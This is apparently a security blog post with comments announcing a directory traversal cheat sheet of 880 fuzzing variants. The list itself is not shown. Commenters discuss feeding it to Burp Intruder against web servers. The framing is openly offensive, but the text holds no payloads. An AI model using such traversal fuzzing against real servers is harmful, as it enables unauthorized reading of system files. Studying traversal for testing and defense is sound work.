You can use this cheat sheet for exploiting web servers and application servers for directory traversal.
This is eight level of deep Directory Traversal. There are 880 variants of Directory Traversal attack signatures.
To use this list effectively, you need to replace the "(Filename)" phrase to the desired file - Depending by the attacked web server OS.
Be my guest to suggest more variants to this awesome list.
Enjoy ;-)
Credits to Luca "ikki" Carettoni.
Open the cheat sheet (this will take few seconds to load this long list)
Blog compatibility view problem: Each line (fuzz) starts after "(FileName)" and ends with the phrase "(FileName)".
ReplyDeleteAny tools to use this payload?
ReplyDeleteI am too lazy to write a script to read every line of this payload, send a request and judge the response' status was 200.
Thanks:)
you have this list on a text file?
ReplyDelete@web security:
ReplyDeleteYou can use Burp Intruder to send this payload.
200 code isn't good enough - You can get an error page with 200-OK header.
@Trancer:
I intentionally posted this list in this way, in order to make it more difficult for people to copy the list with a few clicks.
hehehe.. why would you do that??
ReplyDelete@Narkolayev Shlomi
ReplyDeleteSince the Burp Suite free edition only provide Time-throttled demo version of Burp Intruder, I may consider to write a script myself:)